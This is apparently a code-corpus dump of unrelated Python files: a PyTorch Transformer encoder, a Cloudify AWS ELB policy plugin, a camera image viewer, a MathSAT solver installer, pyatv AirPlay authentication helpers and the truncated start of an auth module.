# Bias initializers selectable by name; _BaseDenseLayer.__init__ validates
# against this mapping (it is defined after the classes, which is fine
# because the name is only resolved at call time).
PERMITTED_BIAS_STRATEGIES = {
    'ones': tf.ones,
    'zeros': tf.zeros
}
|
<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
class PositionalEncoding(nn.Module):
    """Sinusoidal positional encoding added in-place to padded sequences.

    pos_enc[pos, i] = sin(pos / 10000^(2*(i//2)/d)) for even i,
                      cos(pos / 10000^(2*(i//2)/d)) for odd i.
    """

    def __init__(self, max_seq_len, features_dim):
        super(PositionalEncoding, self).__init__()
        pos_enc = np.array(
            [[pos / np.power(10000, 2.0 * (i // 2) / features_dim) for i in range(features_dim)]
             for pos in range(max_seq_len)])
        pos_enc[:, 0::2] = np.sin(pos_enc[:, 0::2])
        pos_enc[:, 1::2] = np.cos(pos_enc[:, 1::2])
        # Register as a (non-persistent) buffer instead of hard-coding .cuda():
        # the table now follows the module across .to()/.cuda() calls and also
        # works on CPU-only machines; persistent=False keeps old checkpoints
        # loadable.  Cast to float32: the original float64 tensor produced by
        # torch.from_numpy makes the in-place += below fail on float32 inputs
        # (in-place ops cannot down-cast Double to Float).
        self.register_buffer(
            'pos_enc', torch.from_numpy(pos_enc).float(), persistent=False)

    def forward(self, x, seq_len):
        # x: [B, T, feat_dim]; seq_len[i] is the valid (unpadded) length of
        # sample i, so padding positions are left untouched.
        for i in range(x.size(0)):
            len_ = seq_len[i]
            x[i, :len_, :] += self.pos_enc[:len_, :].to(x.dtype)
        return x
class LayerNorm(nn.Module):
    """Layer normalization over the last (feature) dimension with a learnable
    affine transform (gamma * x_hat + beta)."""

    def __init__(self, d_hid, eps=1e-6):
        super(LayerNorm, self).__init__()
        # d_hid = feat_dim
        self.gamma = nn.Parameter(torch.ones(d_hid))   # learnable scale
        self.beta = nn.Parameter(torch.zeros(d_hid))   # learnable shift
        self.eps = eps                                 # guards division by zero

    def forward(self, x):
        mu = x.mean(dim=-1, keepdim=True)
        sigma = x.std(dim=-1, keepdim=True)
        normalized = (x - mu) / (sigma + self.eps)
        return self.gamma * normalized + self.beta
class ScaledDotProductAttention(nn.Module):
    """Attention(Q, K, V) = softmax(Q K^T / sqrt(d_k)) V, with dropout applied
    to the attention weights."""

    def __init__(self, d_k, dropout=0.1):
        super(ScaledDotProductAttention, self).__init__()
        self.scale_factor = np.sqrt(d_k)
        self.softmax = nn.Softmax(dim=-1)
        self.dropout = nn.Dropout(dropout)

    def forward(self, q, k, v, atten_mask=None):
        # q: [B, n_head, len_queries, d_k]
        # k: [B, n_head, len_keys, d_k]
        # v: [B, n_head, len_values, d_v] with len_keys == len_values
        scores = torch.matmul(q, k.transpose(-1, -2)) / self.scale_factor
        if atten_mask is not None:
            assert atten_mask.size() == scores.size()
            # Masked positions get a large negative score -> ~zero weight.
            scores.masked_fill_(atten_mask, -1e9)
        atten = self.dropout(self.softmax(scores))
        return torch.matmul(atten, v), atten
class Linear(nn.Module):
    """nn.Linear with Xavier-normal weight init and zero-initialized bias.

    Xavier-normal suits sigmoid/tanh activations; switch the commented line
    for kaiming_normal_ when using ReLU stacks.
    """

    def __init__(self, in_features, out_features, bias=True):
        super(Linear, self).__init__()
        self.linear = nn.Linear(in_features, out_features, bias=bias)
        init.xavier_normal_(self.linear.weight)  # For Sigmoid
        # init.kaiming_normal_(self.linear.weight)  # for ReLU
        # Bug fix: with bias=False the bias attribute is None and
        # init.zeros_(None) raises; only initialize when a bias exists.
        if self.linear.bias is not None:
            init.zeros_(self.linear.bias)

    def forward(self, inputs):
        return self.linear(inputs)
class MultiHeadAttention(nn.Module):
    """Project input to per-head Q/K/V, run scaled dot-product attention per
    head, and concatenate the heads back into the feature dimension."""

    def __init__(self, feat_dim, d_k, d_v, n_heads, dropout):
        super(MultiHeadAttention, self).__init__()
        self.d_k = d_k
        self.d_v = d_v
        self.feat_dim = feat_dim
        self.n_heads = n_heads
        self.w_q = Linear(feat_dim, d_k * n_heads)
        self.w_k = Linear(feat_dim, d_k * n_heads)
        self.w_v = Linear(feat_dim, d_v * n_heads)
        # NOTE: attribute name 'attenion' (sic) is kept as-is; renaming it
        # would change state_dict keys and break existing checkpoints.
        self.attenion = ScaledDotProductAttention(d_k=d_k, dropout=dropout)

    def forward(self, x, atten_mask):
        n_batch = x.size(0)

        def split_heads(proj, depth):
            # [B, len, n_heads*depth] -> [B, n_heads, len, depth]
            return proj.view(n_batch, -1, self.n_heads, depth).transpose(1, 2)

        queries = split_heads(self.w_q(x), self.d_k)
        keys = split_heads(self.w_k(x), self.d_k)
        values = split_heads(self.w_v(x), self.d_v)
        if atten_mask is not None:
            # Broadcast the [B, len, len] mask across heads -> [B, n_heads, len, len].
            atten_mask = atten_mask.unsqueeze(1).repeat(1, self.n_heads, 1, 1)
        context, atten = self.attenion(queries, keys, values, atten_mask)
        # Merge heads back: [B, n_heads, len, d_v] -> [B, len, n_heads*d_v].
        context = context.transpose(1, 2).contiguous().view(n_batch, -1, self.n_heads * self.d_v)
        return context, atten
class MultiHeadAttentionLayer(nn.Module):
    """Multi-head self-attention sub-layer: attention, output projection,
    dropout, then a post-LN residual connection (pre-LN variant left in
    comments, matching the rest of the file)."""

    def __init__(self, feat_dim, d_k, d_v, n_heads, dropout):
        super(MultiHeadAttentionLayer, self).__init__()
        self.n_heads = n_heads
        self.multihead_attention = MultiHeadAttention(feat_dim, d_k, d_v, n_heads, dropout)
        self.linear = Linear(n_heads * d_v, feat_dim)
        self.dropout = nn.Dropout(dropout)
        self.layernorm = LayerNorm(feat_dim)

    def forward(self, x, atten_mask):
        # x: [Batch, len, feat_dim]
        residual = x
        # x = self.layernorm(x)  # pre-LN
        context, atten = self.multihead_attention(x, atten_mask)
        projected = self.dropout(self.linear(context))
        out = self.layernorm(projected + residual)  # post-LN
        # out = projected + residual  # pre-LN
        # out: [Batch, len, feat_dim]
        return out, atten
class PositionWiseFeedForward(nn.Module):
    """Two-layer position-wise feed-forward sub-layer (feat_dim -> d_ff ->
    feat_dim) with ReLU, dropout and a post-LN residual connection."""

    def __init__(self, feat_dim, d_ff=2048, dropout=0.1):
        super(PositionWiseFeedForward, self).__init__()
        self.relu = nn.ReLU()
        self.fc1 = Linear(feat_dim, d_ff)
        self.fc2 = Linear(d_ff, feat_dim)
        self.dropout = nn.Dropout(dropout)
        self.layernorm = LayerNorm(feat_dim)

    def forward(self, x):
        residual = x
        # x = self.layernorm(x)  # pre-LN
        hidden = self.relu(self.fc1(x))
        projected = self.dropout(self.fc2(hidden))
        return self.layernorm(projected + residual)  # post-LN
        # return projected + residual  # pre-LN
class EncoderBlock(nn.Module):
    """One Transformer encoder block: self-attention followed by the
    position-wise feed-forward network."""

    def __init__(self, feat_dim, d_k, d_v, d_ff, n_heads, dropout=0.1):
        super(EncoderBlock, self).__init__()
        self.self_attention = MultiHeadAttentionLayer(feat_dim, d_k, d_v, n_heads, dropout)
        self.position_wise_ff = PositionWiseFeedForward(feat_dim, d_ff, dropout)

    def forward(self, x, atten_mask):
        attended, atten = self.self_attention(x, atten_mask)
        return self.position_wise_ff(attended), atten
|
<reponame>szpotona/cloudify-aws-plugin<gh_stars>0
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ELB.classic.policy
~~~~~~~~~~~~
AWS ELB classic policy interface
"""
# Third party imports
from botocore.exceptions import ClientError
from cloudify.exceptions import OperationRetry
# Local imports
from cloudify_aws.elb import ELBBase
from cloudify_aws.common._compat import text_type
from cloudify_aws.common import decorators, utils
from cloudify_aws.common.connection import Boto3Connection
from cloudify_aws.common.constants import EXTERNAL_RESOURCE_ID
# Human-readable type name used in log messages (see ELBClassicPolicy.type_name).
RESOURCE_TYPE = 'ELB classic policy'
# boto3 API parameter keys for the policy calls.
RESOURCE_NAME = 'PolicyName'
RESOURCE_NAMES = 'PolicyNames'
LB_NAME = 'LoadBalancerName'
LB_PORT = 'LoadBalancerPort'
# Cloudify node types used when resolving relationship targets at runtime.
LB_TYPE = 'cloudify.nodes.aws.elb.Classic.LoadBalancer'
LISTENER_TYPE = 'cloudify.nodes.aws.elb.Classic.Listener'
class ELBClassicPolicy(ELBBase):
    """
    AWS ELB classic policy interface
    """

    def __init__(self, ctx_node, resource_id=None, client=None, logger=None):
        ELBBase.__init__(
            self,
            ctx_node,
            resource_id,
            client or Boto3Connection(ctx_node).client('elb'),
            logger)
        self.type_name = RESOURCE_TYPE

    @property
    def properties(self):
        """Gets the properties of an external resource"""
        # Policies expose no describable state through this interface.
        return None

    @property
    def status(self):
        """Gets the status of an external resource"""
        # Policies have no lifecycle status of their own.
        return None

    def create(self, params):
        """
        Create a new AWS ELB classic policy.

        .. note:
            See http://bit.ly/2oYIQrZ for config details.
        """
        return self.make_client_call('create_load_balancer_policy', params)

    def create_sticky(self, params):
        """
        Create a new AWS ELB classic LB-cookie stickiness policy.

        .. note:
            See http://bit.ly/2oYIQrZ for config details.
        """
        # Lazy %-style logging args: formatting only happens if DEBUG is on.
        self.logger.debug('Creating %s with parameters: %s',
                          self.type_name, params)
        res = self.client.create_lb_cookie_stickiness_policy(**params)
        self.logger.debug('Response: %s', res)
        return res

    def start(self, params):
        """
        Refresh the AWS ELB classic policies.

        .. note:
            See http://bit.ly/2qBuhb5 for config details.
        """
        self.logger.debug('Creating %s with parameters: %s',
                          self.type_name, params)
        res = self.client.set_load_balancer_policies_of_listener(**params)
        self.logger.debug('Response: %s', res)
        return res

    def delete(self, params=None):
        """
        Deletes an existing ELB classic policy.

        .. note:
            See http://bit.ly/2qGiN5e for config details.
        """
        self.logger.debug('Deleting %s with parameters: %s',
                          self.type_name, params)
        return self.client.delete_load_balancer_policy(**params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def prepare(ctx, resource_config, **_):
    """Prepares an ELB classic policy.

    Stashes the raw resource configuration on the node instance so later
    lifecycle operations (create/start/delete) can read it back.
    """
    # Save the parameters
    ctx.instance.runtime_properties['resource_config'] = resource_config
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
@decorators.aws_params(RESOURCE_NAME, params_priority=False)
def create(ctx, iface, resource_config, params, **_):
    """Creates an AWS ELB classic policy"""
    # Resolve the load balancer name: prefer an explicit parameter, fall back
    # to the relationship target of type LB_TYPE.
    lb_name = params.get(LB_NAME)
    if not lb_name:
        rels = utils.find_rels_by_node_type(ctx.instance, LB_TYPE)
        lb_name = rels[0].target.instance.runtime_properties[
            EXTERNAL_RESOURCE_ID]
        params.update({LB_NAME: lb_name})
    # Remember the LB name for the delete operation.
    ctx.instance.runtime_properties[LB_NAME] = lb_name
    # Actually create the resource
    iface.create(params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def create_sticky(ctx, iface, resource_config, **_):
    """Creates an AWS ELB classic LB-cookie stickiness policy"""
    # Work on a copy so the stored resource_config is not mutated.
    params = dict() if not resource_config else resource_config.copy()
    lb_name = params.get(LB_NAME)
    policy_name = params.get(RESOURCE_NAME)
    if not lb_name:
        # Fall back to the LoadBalancer relationship target.
        rels = utils.find_rels_by_node_type(ctx.instance, LB_TYPE)
        lb_name = rels[0].target.instance.runtime_properties[
            EXTERNAL_RESOURCE_ID]
        params.update({LB_NAME: lb_name})
    # Remember both names for the start/delete operations.
    ctx.instance.runtime_properties[LB_NAME] = lb_name
    ctx.instance.runtime_properties[RESOURCE_NAME] = policy_name
    # Actually create the resource
    iface.create_sticky(params)
@decorators.aws_resource(ELBClassicPolicy,
                         RESOURCE_TYPE,
                         ignore_properties=True)
def start_sticky(ctx, iface, resource_config, **_):
    """Starts (applies) an AWS ELB classic policy on a listener.

    The API call requires LoadBalancerName, LoadBalancerPort and
    PolicyNames; each is resolved from relationships or runtime
    properties when not supplied in the resource config.
    """
    # Create a copy of the resource config for clean manipulation.
    params = \
        dict() if not resource_config else resource_config.copy()
    lb_name = params.get(LB_NAME)
    lb_port = params.get(LB_PORT)
    policy_names = params.get(RESOURCE_NAMES)
    # This operation requires the LoadBalancerName, LoadBalancerPort,
    # and the PolicyName.
    if not lb_name:
        targs = \
            utils.find_rels_by_node_type(
                ctx.instance,
                LB_TYPE)
        lb_name = \
            targs[0].target.instance.runtime_properties[
                EXTERNAL_RESOURCE_ID]
        ctx.instance.runtime_properties[LB_NAME] = \
            lb_name
        params.update({LB_NAME: lb_name})
    # The LoadBalancerPort can come either from the resource config,
    # or it can come from a relationship to a Listener or a LoadBalancer.
    # A listener is preferred because only one LoadBalancerPort is expected
    # to be defined per listener, whereas on a LoadBalancer many listeners
    # are defined. If many listeners are found then the first listener is
    # used.
    if not lb_port:
        targs = \
            utils.find_rels_by_node_type(
                ctx.instance,
                LISTENER_TYPE)
        if not targs:
            targs = \
                utils.find_rels_by_node_type(
                    ctx.instance,
                    LB_TYPE)
        # Both branches read the same runtime property, so resolve it once
        # (the original duplicated this assignment in each branch).
        instance_cfg = \
            targs[0].target.instance.runtime_properties['resource_config']
        listener = instance_cfg.get('Listeners', [{}])[0]
        lb_port = listener.get(LB_PORT)
        params.update({LB_PORT: lb_port})
    # This API call takes a list of policies as an argument.
    # However this node type represents only one policy.
    # Therefore we restrict the usage.
    if not policy_names:
        policy_names = ctx.instance.runtime_properties[RESOURCE_NAME]
        params.update({RESOURCE_NAMES: [policy_names]})
    # Actually apply the policy to the listener.
    iface.start(params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def delete(ctx, iface, resource_config, **_):
    """Deletes an AWS ELB classic policy"""
    # Create a copy of the resource config for clean manipulation.
    params = dict() if not resource_config else resource_config.copy()
    # Fall back to the values stashed in runtime properties during create.
    lb = params.get(LB_NAME) or ctx.instance.runtime_properties.get(LB_NAME)
    policy = (params.get(RESOURCE_NAME)
              or ctx.instance.runtime_properties.get(RESOURCE_NAME))
    lb_delete_params = {
        LB_NAME: lb,
        RESOURCE_NAME: policy
    }
    try:
        iface.delete(lb_delete_params)
    except ClientError as e:
        # With 'force' set, ask Cloudify to retry the operation; otherwise
        # the failure is swallowed (best-effort delete).
        if _.get('force'):
            raise OperationRetry('Retrying: {0}'.format(text_type(e)))
|
import argparse
from director import consoleapp
from director import cameraview
from director import applogic
from director import viewbehaviors
from director import objectmodel as om
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtGui
class ImageViewApp(object):
    """Qt/VTK viewer for camera image streams.

    Depending on command-line flags this shows a single RGB stream, or an
    RGB-D pair (color plus depth/disparity view), optionally alongside a
    point-cloud rendering of the depth data.
    """

    def __init__(self):
        # All wiring happens in setup(); start() then only runs the app loop.
        self.setup()

    def addShortcuts(self, widget):
        # Application-wide keyboard shortcuts on the top-level widget.
        applogic.addShortcut(widget, "Ctrl+Q", consoleapp.ConsoleApp.quit)
        applogic.addShortcut(widget, "F8", consoleapp.ConsoleApp.showPythonConsole)

    def parseArgs(self, defaultChannel="MULTISENSE_CAMERA_LEFT"):
        """Parse known command-line options; unrecognized options are ignored
        (parse_known_args), so this app can coexist with other arg consumers."""
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "--channel", type=str, help="image channel", default=defaultChannel
        )
        parser.add_argument(
            "--pointcloud",
            action="store_true",
            help="display pointcloud view for RGB-D messages",
        )
        parser.add_argument(
            "--disparity",
            action="store_true",
            help="receive disparity images for --rgbd flag",
        )
        # --rgb and --rgbd are mutually exclusive; both store into args.imageType.
        imageType = parser.add_mutually_exclusive_group(required=False)
        imageType.add_argument(
            "--rgb",
            action="store_const",
            const="rgb",
            help="receive RGB image messages",
            dest="imageType",
        )
        imageType.add_argument(
            "--rgbd",
            action="store_const",
            const="rgbd",
            help="receive RGB-D images messages",
            dest="imageType",
        )
        imageType.set_defaults(imageType="rgb")
        args, unknown = parser.parse_known_args()
        return args

    def setup(self):
        """Build the image view(s) for the selected channel and lay them out
        side by side in a single window."""
        args = self.parseArgs()
        imageManager = cameraview.ImageManager()
        self.imageManager = imageManager
        channel = args.channel
        imageType = args.imageType
        self.app = consoleapp.ConsoleApp()
        self.views = []
        if imageType == "rgb":
            # Single RGB stream: one view subscribed directly to the channel.
            imageName = channel
            imageManager.queue.addCameraStream(channel, imageName, -1)
            imageManager.addImage(imageName)
            cameraView = cameraview.CameraImageView(
                imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView()
            )
            cameraView.eventFilterEnabled = False
            cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(
                vtk.vtkInteractorStyleImage()
            )
            cameraView.view.resize(640, 480)
            self.views.append(cameraView.view)
            self.cameraView = cameraView
        elif imageType == "rgbd":
            # RGB-D: a color view plus a depth/disparity view.
            imageName = channel + "_LEFT"
            imageManager.queue.addCameraStream(channel, imageName, 0)
            imageManager.addImage(imageName)
            cameraView = cameraview.CameraImageView(
                imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView()
            )
            cameraView.eventFilterEnabled = False
            cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(
                vtk.vtkInteractorStyleImage()
            )
            self.views.append(cameraView.view)
            imageName2 = channel + "_D"
            # NOTE(review): the depth stream subscription is commented out
            # below (it references lcmbotcore message types), so the depth
            # view is only registered via addImage -- confirm whether it
            # actually receives data in this configuration.
            # if args.disparity:
            #     imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DISPARITY_ZIPPED)
            # else:
            #     imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
            imageManager.addImage(imageName2)
            cameraView2 = cameraview.CameraImageView(
                imageManager, imageName2, view=PythonQt.dd.ddQVTKWidgetView()
            )
            cameraView2.eventFilterEnabled = False
            cameraView2.useImageColorMap = True
            cameraView2.view.renderWindow().GetInteractor().SetInteractorStyle(
                vtk.vtkInteractorStyleImage()
            )
            self.views.append(cameraView2.view)
            if args.pointcloud:
                # Optional 3D point-cloud view built from the depth image.
                from director import segmentation

                cameraview.imageManager = imageManager
                pointCloudObj = segmentation.DisparityPointCloudItem(
                    "Point cloud", channel, imageName, imageManager
                )
                view = PythonQt.dd.ddQVTKWidgetView()
                pointCloudObj.addToView(view)
                om.addToObjectModel(pointCloudObj)
                pointCloudObj.setProperty("Visible", True)
                pointCloudObj.setProperty("Target FPS", 30)
                pointCloudObj.setProperty("Max Range", 30)
                pointCloudObj.setProperty("Remove Size", 0)
                # presumably ViewBehaviors registers itself with the view;
                # the local reference is otherwise unused -- TODO confirm.
                viewBehaviors = viewbehaviors.ViewBehaviors(view)
                # Camera at the origin looking along +Z.
                view.camera().SetPosition([0, 0, 0])
                view.camera().SetFocalPoint([0, 0, 1])
                view.camera().SetViewUp([0, -1, 0])
                view.camera().SetViewAngle(45)
                self.views.append(view)
            self.cameraView = cameraView
            self.cameraView2 = cameraView2
        # Lay all views out horizontally in a single window.
        w = QtGui.QWidget()
        l = QtGui.QHBoxLayout(w)
        for view in self.views:
            l.addWidget(view)
        l.setContentsMargins(0, 0, 0, 0)
        w.resize(640 * len(self.views), 480)
        w.show()
        self.addShortcuts(w)
        self.widget = w

    def start(self):
        """Enter the application event loop (blocks until quit)."""
        self.app.start()
def main():
    """Entry point: construct the viewer and run its event loop."""
    ImageViewApp().start()


if __name__ == "__main__":
    main()
|
# Copyright 2014 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
from pysmt.cmd.installers.base import SolverInstaller
class MSatInstaller(SolverInstaller):
    """Installer for the MathSAT python bindings: downloads the platform
    archive, compiles the SWIG bindings, and moves artifacts into place."""

    SOLVER = "msat"

    def __init__(self, install_dir, bindings_dir, solver_version,
                 mirror_link=None):
        # Getting the right archive name
        os_name = self.os_name
        arch = self.architecture
        ext = "tar.gz"
        if os_name == "windows":
            # Windows archives are MSVC zip builds named win32/win64.
            ext = "zip"
            arch = "msvc"
            if self.architecture == "x86_64":
                os_name = "win64"
            else:
                os_name = "win32"
        elif os_name == "darwin":
            os_name = "darwin-libcxx"
        archive_name = "mathsat-%s-%s-%s.%s" % (solver_version, os_name,
                                                arch, ext)
        # {archive_name} is left unexpanded here; presumably SolverInstaller
        # substitutes it when downloading -- TODO confirm.
        native_link = "http://mathsat.fbk.eu/download.php?file={archive_name}"
        SolverInstaller.__init__(self, install_dir=install_dir,
                                 bindings_dir=bindings_dir,
                                 solver_version=solver_version,
                                 archive_name=archive_name,
                                 native_link = native_link,
                                 mirror_link=mirror_link)
        # Directory inside the extracted archive holding the SWIG bindings.
        self.python_bindings_dir = os.path.join(self.extract_path, "python")

    def compile(self):
        """Build the bindings; on Windows first fetch GMP/MPIR dependencies
        and a patched setup.py."""
        if self.os_name == "windows":
            libdir = os.path.join(self.python_bindings_dir, "../lib")
            incdir = os.path.join(self.python_bindings_dir, "../include")
            gmp_h_url = "https://github.com/mikand/tamer-windows-deps/raw/master/gmp/include/gmp.h"
            mpir_dll_url = "https://github.com/Legrandin/mpir-windows-builds/blob/master/mpir-2.6.0_VS2015_%s/mpir.dll?raw=true" % self.bits
            mpir_lib_url = "https://github.com/Legrandin/mpir-windows-builds/blob/master/mpir-2.6.0_VS2015_%s/mpir.lib?raw=true" % self.bits
            setup_py_win_url = "https://github.com/pysmt/solvers_patches/raw/master/mathsat/setup-win.py"
            SolverInstaller.do_download(gmp_h_url, os.path.join(incdir, "gmp.h"))
            SolverInstaller.do_download(mpir_dll_url, os.path.join(libdir, "mpir.dll"))
            SolverInstaller.do_download(mpir_lib_url, os.path.join(libdir, "mpir.lib"))
            # Overwrite setup.py with the patched version
            setup_py = os.path.join(self.python_bindings_dir, "setup.py")
            SolverInstaller.mv(setup_py, setup_py + ".original")
            SolverInstaller.do_download(setup_py_win_url, setup_py)
        # Run setup.py to compile the bindings
        if self.os_name == "windows":
            SolverInstaller.run_python("./setup.py build_ext", self.python_bindings_dir)
        else:
            # NB: -R adds --rpath=$ORIGIN to link step, which makes shared library object
            # searched for in the extension's directory (no need for LD_LIBRARY_PATH)
            # (note: this is the default behavior for DLL discovery on Windows)
            SolverInstaller.run_python("./setup.py build_ext -R $ORIGIN", self.python_bindings_dir)

    def move(self):
        """Move the built wrapper, python module and shared libraries into
        the bindings directory."""
        pdir = self.python_bindings_dir
        bdir = os.path.join(pdir, "build")
        sodir = glob.glob(bdir + "/lib.*")[0]
        libdir = os.path.join(self.python_bindings_dir, "../lib")
        # First, we need the SWIG-generated wrapper
        for f in os.listdir(sodir):
            if f.endswith(".so") or f.endswith(".pyd"):
                SolverInstaller.mv(os.path.join(sodir, f), self.bindings_dir)
        SolverInstaller.mv(os.path.join(pdir, "mathsat.py"), self.bindings_dir)
        # Since MathSAT 5.5.0 we also need the SO/DLL/DYLIB of mathsat in the PATH
        # Under Windows, we also need the DLLs of MPIR in the PATH
        for f in os.listdir(libdir):
            if f.endswith(".so") or f.endswith(".dll") or f.endswith(".dylib"):
                SolverInstaller.mv(os.path.join(libdir, f), self.bindings_dir)
        # Fix issue in MathSAT 5.5.1 linking to incorrect directory on OSX
        if self.os_name == "darwin":
            soname = glob.glob(self.bindings_dir + "/_mathsat*.so")[0]
            old_path = "/Users/griggio/Documents/src/mathsat_release/build/libmathsat.dylib"
            new_path = "%s/libmathsat.dylib" % self.bindings_dir
            SolverInstaller.run("install_name_tool -change %s %s %s" %
                                (old_path, new_path, soname))

    def get_installed_version(self):
        """Query the installed MathSAT version via the helper script."""
        return self.get_installed_version_script(self.bindings_dir, "msat")
|
<filename>pyatv/protocols/airplay/auth/__init__.py<gh_stars>100-1000
"""Pick authentication type based on device support."""
import logging
from typing import Tuple
from pyatv import exceptions
from pyatv.auth.hap_pairing import (
NO_CREDENTIALS,
TRANSIENT_CREDENTIALS,
AuthenticationType,
HapCredentials,
PairSetupProcedure,
PairVerifyProcedure,
parse_credentials,
)
from pyatv.auth.hap_session import HAPSession
from pyatv.auth.hap_srp import SRPAuthHandler
from pyatv.interface import BaseService
from pyatv.protocols.airplay.auth.hap import (
AirPlayHapPairSetupProcedure,
AirPlayHapPairVerifyProcedure,
)
from pyatv.protocols.airplay.auth.hap_transient import (
AirPlayHapTransientPairVerifyProcedure,
)
from pyatv.protocols.airplay.auth.legacy import (
AirPlayLegacyPairSetupProcedure,
AirPlayLegacyPairVerifyProcedure,
)
from pyatv.protocols.airplay.srp import LegacySRPAuthHandler, new_credentials
from pyatv.protocols.airplay.utils import AirPlayFlags, parse_features
from pyatv.support.http import HttpConnection
_LOGGER = logging.getLogger(__name__)
# Salt and info strings used to derive the control-channel encryption keys
# (passed to PairVerifyProcedure.encryption_keys in verify_connection below).
CONTROL_SALT = "Control-Salt"
CONTROL_OUTPUT_INFO = "Control-Write-Encryption-Key"
CONTROL_INPUT_INFO = "Control-Read-Encryption-Key"
class NullPairVerifyProcedure:
    """No-op Pair-Verify used when the device requires no verification."""

    async def verify_credentials(self) -> bool:
        """Report that no credentials were verified (no keys negotiated)."""
        _LOGGER.debug("Performing null Pair-Verify")
        return False

    @staticmethod
    def encryption_keys(salt: str, output_info: str, input_key: str) -> Tuple[str, str]:
        """Unsupported: the null procedure never derives encryption keys."""
        raise exceptions.NotSupportedError(
            "encryption keys not supported by null implementation"
        )
def pair_setup(
    auth_type: AuthenticationType, connection: HttpConnection
) -> PairSetupProcedure:
    """Return procedure object used for Pair-Setup."""
    _LOGGER.debug("Setting up new AirPlay Pair-Setup procedure with type %s", auth_type)

    if auth_type == AuthenticationType.Legacy:
        handler = LegacySRPAuthHandler(new_credentials())
        handler.initialize()
        return AirPlayLegacyPairSetupProcedure(connection, handler)

    if auth_type == AuthenticationType.HAP:
        handler = SRPAuthHandler()
        handler.initialize()
        return AirPlayHapPairSetupProcedure(connection, handler)

    # Transient (and any other) credential types have no Pair-Setup step.
    raise exceptions.NotSupportedError(
        f"authentication type {auth_type} does not support Pair-Setup"
    )
def pair_verify(
    credentials: HapCredentials, connection: HttpConnection
) -> PairVerifyProcedure:
    """Return procedure object used for Pair-Verify."""
    _LOGGER.debug(
        "Setting up new AirPlay Pair-Verify procedure with type %s", credentials.type
    )
    cred_type = credentials.type

    if cred_type == AuthenticationType.Null:
        return NullPairVerifyProcedure()

    if cred_type == AuthenticationType.Legacy:
        legacy_srp = LegacySRPAuthHandler(credentials)
        legacy_srp.initialize()
        return AirPlayLegacyPairVerifyProcedure(connection, legacy_srp)

    # HAP and transient credentials share the same SRP handler.
    srp = SRPAuthHandler()
    srp.initialize()
    if cred_type == AuthenticationType.HAP:
        return AirPlayHapPairVerifyProcedure(connection, srp, credentials)
    return AirPlayHapTransientPairVerifyProcedure(connection, srp)
async def verify_connection(
    credentials: HapCredentials, connection: HttpConnection
) -> PairVerifyProcedure:
    """Perform Pair-Verify on a connection and enable encryption.

    Returns the verifier so callers can derive further keys from it.
    (The previous ``-> None`` annotation was wrong: the verifier is
    explicitly returned.)
    """
    verifier = pair_verify(credentials, connection)
    has_encryption_keys = await verifier.verify_credentials()

    # Only wrap the transport in encryption when the verify step actually
    # negotiated keys (the null procedure reports False).
    if has_encryption_keys:
        output_key, input_key = verifier.encryption_keys(
            CONTROL_SALT, CONTROL_OUTPUT_INFO, CONTROL_INPUT_INFO
        )

        session = HAPSession()
        session.enable(output_key, input_key)
        connection.receive_processor = session.decrypt
        connection.send_processor = session.encrypt
    return verifier
def extract_credentials(service: BaseService) -> HapCredentials:
    """Extract credentials from service based on what's supported."""
    # Explicitly stored credentials always win.
    if service.credentials is not None:
        return parse_credentials(service.credentials)

    # Otherwise decide from the advertised feature flags whether transient
    # (pairing-less) credentials can be used.
    feature_flags = parse_features(service.properties.get("features", "0x0"))
    transient_supported = (
        AirPlayFlags.SupportsSystemPairing in feature_flags
        or AirPlayFlags.SupportsCoreUtilsPairingAndEncryption in feature_flags
    )
    return TRANSIENT_CREDENTIALS if transient_supported else NO_CREDENTIALS
|
# TODO check if jwt is used and all modules are present
from ..._py2 import *
from future.utils import with_metaclass
import logging
import re
from datetime import datetime
from collections import OrderedDict
import hashlib
# optional features
try:
from passlib import hash as unix_hash
except ImportError:
pass
from ... import endpoints
from ...utils import is_str, is_seq_like, is_map_like, \
datetime_to_timestamp, curr_timestamp, open_path
from ..base import BaseMeta, BaseHTTPRequestHandler
from .utils import num_charsets
from .exc import UserAlreadyExistsError, NoSuchUserError, \
InvalidUsernameError, BadPasswordError
logger = logging.getLogger(__name__)
class ReadOnlyDict(object):
    """Mixin exposing an object's public, non-callable attributes through a
    read-only dict-style interface (indexing, iteration, .get(), ...)."""

    @property
    def _dict_data(self):
        # Snapshot of the public state: every entry of the instance __dict__
        # that is not underscore-prefixed and not callable.
        return {name: value for name, value in self.__dict__.items()
                if not name.startswith('_') and not callable(value)}

    def __contains__(self, key):
        return key in self._dict_data

    def __getitem__(self, key):
        return self._dict_data[key]

    def __iter__(self):
        return iter(self._dict_data)

    def __len__(self):
        return len(self._dict_data)

    def __str__(self):
        return str(self._dict_data)

    def __repr__(self):
        return repr(self._dict_data)

    def get(self, key, default=None):
        return self._dict_data.get(key, default)

    def items(self):
        return self._dict_data.items()

    def keys(self):
